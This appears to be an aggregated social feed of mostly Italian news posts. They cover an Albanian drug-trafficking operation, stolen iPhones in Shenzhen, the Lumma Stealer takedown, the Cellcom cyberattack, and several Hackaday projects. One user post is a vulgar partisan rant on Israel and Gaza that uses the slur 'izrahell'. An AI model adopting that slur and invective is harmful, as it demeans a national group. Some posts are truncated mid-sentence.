L’operazione si incardina nel più ampio progetto investigativo della DDA di Bari e della SPAK di Tirana volto a contrastare l’incessante traffico internazionale di cocaina ed eroina, gestito dalle organizzazioni criminali albanesi. In tale contesto, in esito alle precedenti operazioni “Shefi”, “Kulmi” e “Shpirti”, tra il 2018 e il 2021 la DIA di Bari ha già dato esecuzione complessivamente a 118 misure cautelari, al sequestro di beni mobili ed immobili per diversi milioni di euro e al rinvenimento di oltre sei tonnellate di droga tra marijuana, cocaina e hashish, permettendo, nei vari gradi di giudizio, di comminare pene, per ciascun imputato, fino a 20 anni di reclusione.
L'operazione è stata eseguita su richiesta e da:
Italia: Ufficio della pubblica procuratore Bari - Direzione anti-Mafia distrettuale; Direzione Investigativa Antimafia di Bari, con il sostegno dell'ufficio dell'esperto di sicurezza presso l'ambasciata italiana di Tirana Albania: speciale procuratore anticorruzione e procura del crimine organizzato (SPAK) di Tirana; Polizia albanese

#eurojust #jit #sic #SKYECC #ura #DIA #SPAK

@Attualità



A quali rischi cyber sono esposti i minori e cosa devono sapere i genitori


@Informatica (Italy e non Italy 😁)
Un rapporto della Polizia Postale per la Sicurezza cibernetica rilancia il tema della sicurezza dei minori, esposti a cyber rischi sempre più sofisticati e numerosi. Cosa devono sapere e cosa devono fare i genitori
L'articolo A quali rischi cyber sono esposti i minori e cosa devono sapere i genitori

reshared this



Tanto debito, poca crescita. L’Italia ancora preda del disastro Superbonus

@Politica interna, europea e internazionale

L’Italia e l’Europa hanno smesso di crescere. Un dato noto, ribadito dalle nuove stime di primavera della Commissione europea, che ha ritoccato a ribasso le previsioni per l’eurozona dell’anno in corso, dall’1,3% di novembre all’attuale 0,9%. Riviste in



Leonardo si espande ancora e punta agli algoritmi predittivi made in Usa

@Notizie dall'Italia e dal mondo

Dopo la joint venture con Rheinmetall per lo sviluppo di carri armati, l’accordo con Baykar per la produzione di droni, la progettazione del caccia di sesta generazione Gcap insieme a Bae Systems e Mitsubishi e l’accordo sui satelliti con Thales, Leonardo continua



Pavel Nilin – Crudeltà
freezonemagazine.com/news/pave…
In libreria dal 29 Maggio 2025 readerforblind pubblica Crudeltà, il romanzo più celebre di Pavel Nilin, autore e giornalista sovietico che per anni lavorò come funzionario di polizia nelle regioni più remote della Siberia. Scritto nel 1956 durante il disgelo kruscioviano e ambientato nei primi anni dopo la rivoluzione russa, Crudeltà è un poliziesco […]
L'articolo Pavel Nilin – Crudeltà proviene
In libreria dal


Dove finiscono gli iPhone rubati? A Shenzhen c’è una torre che li rivende a pezzi


A Shenzhen, in Cina, c’è un edificio anonimo chiamato Feiyang Times, una torre grigio-marrone con colonne adornate con striscioni di propaganda. A prima vista non sembra niente di speciale, se non fosse per il soprannome che gli inglesi chiamano così su Internet: “la costruzione degli iPhone rubati”. Al terzo e al quarto piano si svolge un vivace mercato notturno di iPhone provenienti dall’Europa e dagli Stati Uniti: molti sono usati, ma alcuni, a quanto pare, erano lì contro la loro volontà.

Ed è qui che entrano in gioco gli smartphone restituiti dagli utenti occidentali in seguito a un cambio di modello, così come i dispositivi con un passato discutibile. I messaggi sui forum, sui social network e persino quelli delle vittime stesse puntano sempre più spesso allo stesso indirizzo: Huachiangbei, un distretto di Shenzhen che è diventato il fulcro della catena di rivendita di prodotti elettronici. La catena inizia con i furti in Occidente, passa per Hong Kong e termina nei negozi dell’emisfero australe.

Ad esempio, l’imprenditore londinese Sam Amrani ha perso il suo iPhone 15 Pro proprio per strada: due uomini in bicicletta elettrica lo hanno fermato all’istante e gli hanno strappato il telefono dalle mani. Una settimana dopo, il dispositivo è stato avvistato a Hong Kong e poi a Shenzhen. Sam ha pubblicato la storia su LinkedIn e ha scoperto di non essere l’unico la cui attrezzatura era stata spedita in Cina.

I venditori del mercato di Feiyang affermano che a Shenzhen c’è un acquirente per praticamente ogni parte di uno smartphone, dallo schermo agli elementi in rame. Anche i dispositivi bloccati vengono utilizzati come pezzi di ricambio. Particolarmente apprezzati sono gli iPhone provenienti dagli Stati Uniti: sono più economici a causa delle restrizioni di rete e consentono l’uso degli app store globali. Nell’area vendita si possono incontrare clienti provenienti da Pakistan, Libia, Hong Kong. Qualcuno sta cercando lotti da 200-300 dispositivi. Alcune persone hanno solo schermi e chip. Esiste addirittura una richiesta di custodie e plastica, che vengono poi rifuse.

A quanto pare, la maggior parte degli iPhone arriva a Shenzhen passando per Hong Kong, un porto franco doganale. L’edificio industriale su Hung To Road è un alveare di attività all’ingrosso, con decine di aziende che vendono dispositivi all’ingrosso, a volte contrassegnati con la dicitura “iCloud bloccato”. Molti telefoni sono già nelle mani di rivenditori provenienti da Turchia, Cina e Filippine. Le aste si svolgono su WhatsApp, WeChat e persino Facebook.

Chi ha a che fare con questi lotti sostiene di non riuscire a sbloccare i dispositivi, ma anche i telefoni “bloccati” possono essere venduti a prezzi vantaggiosi per i pezzi di ricambio. Sebbene le vittime ricevano spesso messaggi da acquirenti in Cina che chiedono o li convincono a rimuovere il blocco di attivazione. A volte minacciano direttamente.

La direzione dell’edificio del Feiyang Times ha rifiutato di rilasciare dichiarazioni. L’ufficio ha riferito che i venditori lavorano come privati ​​e sono responsabili personalmente dell’assortimento. La polizia di Hong Kong ha dichiarato che avrebbe agito nel rispetto della legge se ne avesse avuto i motivi. Il governo di Shenzhen non ha risposto alla richiesta.

L'articolo Dove finiscono gli iPhone rubati? A Shenzhen c’è una torre che li rivende a pezzi proviene da il blog della sicurezza informatica.



Roller Gearbox Allows For New Angles in Robotics


Wire-frame image of gearbox, setup as a differential

DIY mechatronics always has some unique challenges when relying on simple tools. 3D printing enables some great abilities but high precision gearboxes are still a difficult problem for many. Answering this problem, [Sergei Mishin] has developed a very interesting gearbox solution based on a research paper looking into simple rollers instead of traditional gears. The unique attributes of the design come from the ability to have a compact angled gearbox similar to a bevel gearbox.

Multiple rollers rest on a simple shaft allowing each roller to have independent rotation. This is important because having a circular crown gear for angled transmission creates different rotation speeds. In [Sergei]’s testing, he found that his example gearbox could withstand 9 Nm with the actual adapter breaking before the gearbox showing decent strength.

red crown gear on a white frame. Blue gear with brass rollers are engaged with the crown.

Of course, how does this differ from a normal bevel gear setup or other 3D printed gearboxes? While 3D printed gears have great flexibility in their simplicity to make, having plastic on plastic is generally very difficult to get precise and long lasting. [Sergei]’s design allows for a highly complex crown gear to take advantage of 3D printing while allowing for simple rollers for improved strength and precision.

While claims of “zero backlash” may be a bit far-fetched, this design still shows great potential in helping make some cool projects. Unique gearboxes are somewhat common here at Hackaday such as this wobbly pericyclic gearbox, but they almost always have a fun spin!

youtube.com/embed/VXcuryyRGbo?…

Thanks to [M] for the tip!


hackaday.com/2025/05/22/roller…



Chi ha vinto tra India e Pakistan? Gli aerei da combattimento cinesi


@Notizie dall'Italia e dal mondo
I caccia di fabbricazione cinese hanno rubato la scena, quelli francesi hanno perso. Sullo sfondo ci sono i nazionalismi di India e Pakistan sfruttati da altre potenze
L'articolo Chi ha vinto tra India e Pakistan? Gli aerei da combattimento cinesi proviene da Pagine Esteri.



se un cecchino demmerda sfiora un console, "tensione israele-italia", "convocato l'ambasciatore israeliano", indignazione & sorpresa.
se l'esercito demmerda di quel cecchino rade al suolo un paese e ammazza più di 50mila civili in maggioranza donne e bambini, si accoglie il primo ministro genocida con baci abbracci e alleanze.
l'importante è che non sia il tuo culo ad essere in pericolo.
not in my backyard.

#notinmybackyard #Gaza #Palestina #esercito #console #izrahell



La Corte suprema israeliana ha detto che il licenziamento del capo dei servizi segreti da parte del governo è stato illegale


Immagino che adesso anche la Corte Suprema israeliana riceverà accuse di antisemitismo.

Comunque:

Per la Corte il licenziamento è illecito sia perché il governo non si era rivolto all’organo competente per la rimozione del capo dello Shin Bet, sia per il conflitto di interessi di Netanyahu, visto che a essere indagati erano suoi collaboratori.

Bar comunque si dimetterà il 15 giugno, come ha annunciato ad aprile citando le proprie responsabilità negli attacchi del 7 ottobre 2023 di Hamas contro Israele.

ilpost.it/2025/05/21/corte-sup…



Jettison Sails for Electric Propulsion


Although there are some ferries and commercial boats that use a multi-hull design, the most recognizable catamarans by far are those used for sailing. They have a number of advantages over monohull boats including higher stability, shallower draft, more deck space, and often less drag. Of course, these advantages aren’t exclusive to sailboats, and plenty of motorized recreational craft are starting to take advantage of this style as well. It’s also fairly straightforward to remove the sails and add powered locomotion as well, as this electric catamaran demonstrates.

Not only is this catamaran electric, but it’s solar powered as well. With the mast removed, the solar panels can be fitted to a canopy which provides 600 watts of power as well as shade to both passengers. The solar panels charge two 12V 100ah LifePo4 batteries and run a pair of motors. That’s another benefit of using a sailing cat as an electric boat platform: the rudders can be removed and a pair of motors installed without any additional drilling in the hulls, and the boat can be steered with differential thrust, although this boat also makes allowances for pointing the motors in different directions as well.

In addition to a highly polished electric drivetrain, the former sailboat adds some creature comforts as well, replacing the trampoline with a pair of seats and adding an electric hoist to raise and lower the canopy. As energy density goes up and costs come down for solar panels, more and more watercraft are taking advantage of this style of propulsion as well. In the past we’ve seen solar kayaks, solar houseboats, and custom-built catamarans (instead of conversions) as well.

youtube.com/embed/1DyONG2oHPg?…


hackaday.com/2025/05/21/jettis…



Lumma Stealer: inizio del takedown o solo una mossa tattica?


Nelle ultime ore si è assistito a un grande clamore mediatico riguardante il “takedown” dell’infrastruttura del noto malware-as-a-service Lumma Stealer, con un’operazione congiunta guidata dall’FBI, Europol, CISA e partner privati come Microsoft. L’azione ha colpito i sistemi di distribuzione e i canali di affitto del malware, mirando a interrompere una delle minacce cybercriminali più attive degli ultimi anni.

Tuttavia, come emerge anche dall’articolo di BleepingComputer e da verifiche indipendenti, è importante distinguere tra il successo tattico dell’operazione e l’effettiva capacità di neutralizzare l’infrastruttura di Lumma Stealer.

Secondo le dichiarazioni ufficiali, sono stati sequestrati oltre 2.300 domini legati a Lumma e chiuse alcune piattaforme di vendita e affitto del malware. Microsoft ha ottenuto un’ordinanza per disabilitare infrastrutture gestite attraverso registrar fraudolenti. Tuttavia, l’analisi tecnica suggerisce che il malware è ancora operativo in parte della sua rete.

Test condotti su campioni attivi mostrano che Lumma è ancora in grado di comunicare con server C2 non colpiti. Alcuni operatori underground hanno confermato disservizi temporanei risolti in tempi brevi. Questo dimostra che, pur rappresentando un’importante azione di disturbo, l’operazione non ha colpito in modo definitivo la catena operativa del malware.
Un pannello ancora attivo vs uno sequestrato

La sfida delle infrastrutture flessibili


Lumma, come altri infostealer, è progettato per essere resiliente. Le sue componenti infrastrutturali vengono ruotate frequentemente, i C2 vengono cambiati ogni giorno, e i panel di controllo sono distribuiti e replicabili. Questo rende difficile per le autorità infliggere un danno permanente solo attraverso il sequestro di domini. L’infrastruttura può riorganizzarsi rapidamente, grazie a backup e domini dormienti pronti all’attivazione.

Pressione anche sugli affiliati


Un elemento interessante è il presunto sequestro del canale Telegram ufficiale di Lumma, o quantomeno la sua compromissione da parte delle autorità. Dopo una prima comunicazione in lingua russa, è comparso un secondo messaggio in inglese attribuito direttamente al Federal Bureau of Investigation, rafforzato da un’immagine simbolica che mostra un uccello dietro le sbarre.

Il messaggio, rivolto agli abbonati del servizio, ringrazia ironicamente i membri del team Lumma per l'”ospitalità” concessa nel canale, accusando al contempo gli amministratori di non aver protetto i propri clienti.

Viene inoltre offerta la possibilità di contattare direttamente l’FBI tramite Telegram, Signal o email, in un apparente invito alla collaborazione o alla resa volontaria. La comunicazione chiude con una frase dal tono volutamente ambiguo: “se non ci contattate voi, non preoccupatevi: lo faremo noi”.

Questa manovra, se autentica, va oltre il semplice sequestro tecnico: rappresenta una forma di pressione psicologica mirata a erodere la fiducia degli utenti finali nel servizio stesso, scoraggiando future attività e instaurando un clima di panico o diffidenza all’interno dell’ecosistema criminale.

Il ruolo strategico degli attori privati


Uno degli aspetti più significativi di questa operazione è il coinvolgimento diretto di aziende private nella fase di intelligence, sequestro e disabilitazione tecnica dell’infrastruttura di Lumma Stealer. Microsoft ha avuto un ruolo centrale nell’ottenere un’ordinanza per il sequestro di domini gestiti da registrar fraudolenti.

ESET ha partecipato con attività di monitoraggio e analisi proattiva delle componenti malware, fornendo informazioni fondamentali sulle modalità di funzionamento di Lumma e supportando l’attribuzione degli elementi infrastrutturali. CleanDNS ha collaborato al blocco e alla de-registrazione dei domini malevoli, mentre Cloudflare ha contribuito con dati e strumenti di threat intelligence volti a contrastare le tecniche di evasione utilizzate da Lumma per mascherare il proprio traffico C2.

Questa sinergia tra pubblico e privato ha rappresentato una leva fondamentale per portare avanti un’operazione coordinata su scala globale, dimostrando come l’efficacia di una cyber-operazione oggi dipenda sempre più dalla collaborazione trasversale tra attori istituzionali e industria della sicurezza.

Gli infostealer superano i ransomware?


Questa operazione, sebbene non definitiva, rappresenta un’importante inversione di tendenza: si comincia a colpire sistematicamente un fenomeno in fortissima espansione. Gli stealer come Lumma stanno diventando il vero motore economico del cybercrime moderno.

La vendita massiva di log, credenziali, cookie e wallet esfiltrati avviene in modo automatico su marketplace underground e Telegram, generando profitti costanti, anche in assenza di estorsione diretta.

Il takedown parziale di Lumma Stealer rappresenta un risultato concreto, ma non ancora risolutivo. L’infrastruttura ha subito un colpo, ma non è stata smantellata del tutto. Il malware continua a circolare, anche se con meno efficienza.

È quindi fondamentale osservare le prossime mosse delle autorità: solo la continuità operativa e un cambio di passo strategico potranno incidere in modo duraturo su una minaccia che si è già evoluta oltre i confini del modello ransomware.

Fonti:


L'articolo Lumma Stealer: inizio del takedown o solo una mossa tattica? proviene da il blog della sicurezza informatica.



Microsoft punta alla Fusione Nucleare. Le AI dovranno trovare una risposta per alimentarsi


Microsoft ritiene che l’intelligenza artificiale potrebbe accelerare lo sviluppo della fusione nucleare come fonte energetica pratica, il che a sua volta potrebbe aiutare a rispondere alla domanda su come alimentare l’intelligenza artificiale stessa.

La fusione nucleare, nel contesto della generazione di elettricità, è una tecnologia che, come l’informatica quantistica, esiste in teoria e negli esperimenti di laboratorio, ma non ha ancora raggiunto la scala industriale. I reattori sperimentali producono solo momentaneamente più energia di quanta ne consumino.

I sostenitori di questa tecnologia ritengono che la fusione fornirà all’umanità energia pulita praticamente illimitata, il che è particolarmente rilevante per Microsoft, che sta sviluppando prodotti di intelligenza artificiale con un consumo energetico gigantesco .La protezione non è un’opzione. È una necessità.

Presso Microsoft Research e tra i principali fisici è emersa l’idea di utilizzare l’apprendimento automatico, ora denominato IA, per accelerare i progressi nella fusione. “La ricerca della fusione nucleare come fonte di energia illimitata e pulita è da tempo uno degli obiettivi più ambiziosi dell’umanità”, scrivono i ricercatori di Microsoft Research Kenji Takeda, Shruti Rajurkar e Ade Famoti nel loro articolo .

“Sebbene ci vorranno ancora anni per arrivare a un’energia di fusione scalabile, i ricercatori stanno ora esplorando come l’intelligenza artificiale possa accelerarne lo sviluppo e avvicinarla all’adozione nella rete energetica.” Parte di questa ricerca è stata discussa a marzo al primo Fusion Summit di Microsoft Research, un incontro di scienziati che sperano di accelerare lo sviluppo della fusione basata sull’intelligenza artificiale, una tecnologia in cui Microsoft sta investendo miliardi di dollari.

youtube.com/embed/fVjasUaj4nc?…

Ashley Llorens, vicepresidente di Microsoft Research, ha aperto l’evento riflettendo su quanto sarebbe fantastico promuovere la sostenibilità attraverso l’informatica e l’intelligenza artificiale.

Tali riflessioni sono necessarie perché l’intelligenza artificiale non può ancora essere definita sostenibile. Come osserva il Programma delle Nazioni Unite per l’Ambiente, “I data center che ospitano server di intelligenza artificiale generano rifiuti elettronici. Consumano enormi quantità di acqua ed elettricità e utilizzano risorse rare che spesso vengono estratte in modo non sostenibile”.

Microsoft sta cercando di ridurre l’impatto ambientale dell’intelligenza artificiale attraverso compensazioni di carbonio, l’acquisto di energia pulita e l’ottimizzazione di software e hardware. Se riuscissimo ad accelerare lo sviluppo della fusione nucleare, potremmo compensare parte dei danni, a meno che, naturalmente, nel frattempo la situazione non sfugga di mano.

Sir Stephen Cowley, direttore del Princeton Plasma Physics Laboratory ed ex capo dell’Autorità per l’energia atomica del Regno Unito, ha tenuto un discorso e ha sottolineato che sono necessarie molte più ricerche per capire se l’intelligenza artificiale può davvero aiutare a trovare la configurazione ottimale del reattore in grado di produrre energia a un costo accessibile.

L'articolo Microsoft punta alla Fusione Nucleare. Le AI dovranno trovare una risposta per alimentarsi proviene da il blog della sicurezza informatica.



Wisconsin e Michigan senza telefono: Cellcom è stata attaccata. Niente chiamate per una settimana


Gli abbonati dell’operatore di telecomunicazioni Cellcom, che serve gli utenti del Wisconsin e dell’Upper Michigan (USA), sono rimasti senza comunicazione per quasi una settimana: non potevano né chiamare né inviare SMS. Solo pochi giorni dopo l’inizio dell’incidente l’azienda ha ammesso ciò che era già stato sospettato: un attacco informatico aveva causato i massicci disagi.

Inizialmente, l’operatore ha definito l’incidente un malfunzionamento tecnico, assicurando che la trasmissione dati, iMessage, i messaggi RCS e le chiamate di emergenza al 911 hanno continuato a funzionare. Tuttavia, gli utenti esprimevano sempre più insoddisfazione per la mancanza di comunicazione e l’impossibilità di trasferire un numero a un altro operatore: i sistemi interni di Cellcom semplicemente non funzionavano.

Ora l’amministratore delegato dell’azienda, Brigid Riordan, ha confermato ufficialmente che si tratta di un “incidente informatico”.

In una lettera agli abbonati, ha sottolineato che l’azienda aveva messo in atto dei protocolli di risposta e che il team aveva seguito tali piani fin dall’inizio. Le misure adottate includono l’intervento di esperti esterni in sicurezza informatica, la notifica all’FBI e alle autorità del Wisconsin e il lavoro 24 ore su 24 per ripristinare i sistemi.

L’attacco ha colpito solo un segmento separato dell’infrastruttura, non correlato all’archiviazione dei dati personali. Finora non ci sono state prove di fughe di informazioni, compresi nomi, indirizzi e dati finanziari degli abbonati.

Al momento alcuni servizi vengono gradualmente ripristinati. Il 19 maggio gli utenti hanno potuto scambiarsi SMS ed effettuare chiamate all’interno della rete Cellcom. Tuttavia, i tempi necessari per una completa ripresa restano incerti. Nella sua pagina degli aggiornamenti, la società ha affermato che prevede di ripristinare tutti i servizi entro la fine della settimana, ma non è riuscita a fornire una data esatta.

Per gli abbonati il ​​cui ripristino della connessione è in ritardo, viene offerto un modo semplice per provare a ripristinare il servizio: attivare la modalità aereo per 10 secondi, quindi disattivarla. Se il problema persiste, riavviare il dispositivo.

Nonostante le crescenti critiche per la lenta risposta, Cellcom ha iniziato a essere più aperta sulla situazione: oltre alla lettera, l’amministratore delegato ha anche registrato un videomessaggio in cui spiega la situazione attuale e i progressi della ripresa. L’azienda non ha rilasciato dichiarazioni in merito al possibile attacco ransomware.

La situazione attuale dimostra quanto possa diventare critica la dipendenza dalla stabilità delle infrastrutture digitali, anche a livello regionale. Allo stesso tempo, Cellcom sottolinea di essersi preparata in anticipo a simili incidenti, ma che le conseguenze sono state comunque avvertite da decine di migliaia di utenti.

L'articolo Wisconsin e Michigan senza telefono: Cellcom è stata attaccata. Niente chiamate per una settimana proviene da il blog della sicurezza informatica.



Digitale Souveränität: Amazon will Cloud-Verträge in der Schweiz geheim halten


netzpolitik.org/2025/digitale-…



Gene Editing Spiders to Produce Red Fluorescent Silk



Regular vs gene-edited spider silk with a fluorescent gene added. (Credit: Santiago-Rivera et al. 2025, Angewandte Chemie)Regular vs gene-edited spider silk with a fluorescent gene added. (Credit: Santiago-Rivera et al. 2025, Angewandte Chemie)
Continuing the scientific theme of adding fluorescent proteins to everything that moves, this time spiders found themselves at the pointy end of the CRISPR-Cas9 injection needle. In a study by researchers at the University of Bayreuth, common house spiders (Parasteatoda tepidariorum) had a gene inserted for a red fluorescent protein in addition to having an existing gene for eye development disabled. This was the first time that spiders have been subjected to this kind of gene-editing study, mostly due to how fiddly they are to handle as well as their genome duplication characteristics.

In the research paper in Angewandte Chemie the methods and results are detailed, with the knock-out approach of the sine oculis (C1) gene being tried first as a proof of concept. The CRISPR solution was injected into the ovaries of female spiders, whose offspring then carried the mutation. With clear deficiencies in eye development observable in this offspring, the researchers moved on to adding the red fluorescent protein gene with another CRISPR solution, which targets the major ampullate gland where the silk is produced.

Ultimately, this research serves to demonstrate that it is possible to not only study spiders in more depth these days using tools like CRISPR-Cas9, but also that it is possible to customize and study spider silk production.


hackaday.com/2025/05/21/gene-e…



trump: il liberatore degli oppressi: i bianchi. ma chi ci crede? fosse mai fregato qualcosa a trump degli oppressi...


High Voltage for Extreme Ozone


Grid overlayed onto a mason jar. Across the grid are high voltage purple coronas.

Don’t you hate it when making your DIY X-ray machine you make an uncomfortable amount of ozone gas? No? Well [Hyperspace Pirate] did, which made him come up with an interesting idea. While creating a high voltage supply for his very own X-ray machine, the high voltage corona discharge produced a very large amount of ozone. However, normally ozone is produced using lower voltage, smaller gaps, and large surface areas. Naturally, this led [Hyperspace Pirate] to investigate if a higher voltage method is effective at producing ozone.

Using a custom 150kV converter, [Hyperspace Pirate] was able to test the large gap method compared to the lower voltage method (dielectric barrier discharge). An ammonia reaction with the ozone allowed our space buccaneer to test which method was able to produce more ozone, as well as some variations of the designs.

Experimental setup with two mason jars hooked up from ozone production to nitrateExperimental Setup with ozone production in the left jar and nitrate in the right.
Large 150kV gaps proved slightly effective but with no large gains, at least not compared to the dielectric barrier method. Of which, glass as the dielectric leads straight to holes, and HTPE gets cooked, but in the end, he was able to produce a somewhat sizable amount of ammonium nitrate. The best design included two test tubes filled with baking soda and their respective electrodes. Of course, this comes with the addition of a very effective ozone generator.

While this project is very thorough, [Hyperspace Pirate] himself admits the extreme dangers of high ozone levels, even getting close enough to LD50 levels for worry throughout out his room. This goes for when playing with high voltage in general kids! At the end of the day even with potential asthma risk, this is a pretty neat project that should probably be left to [Hyperspace Pirate]. If you want to check out other projects from a distance you should look over to this 20kW microwave to cook even the most rushed meals!

youtube.com/embed/HZYWpZYuRKc?…

Thanks to [Mahdi Naghavi] for the Tip!


hackaday.com/2025/05/21/high-v…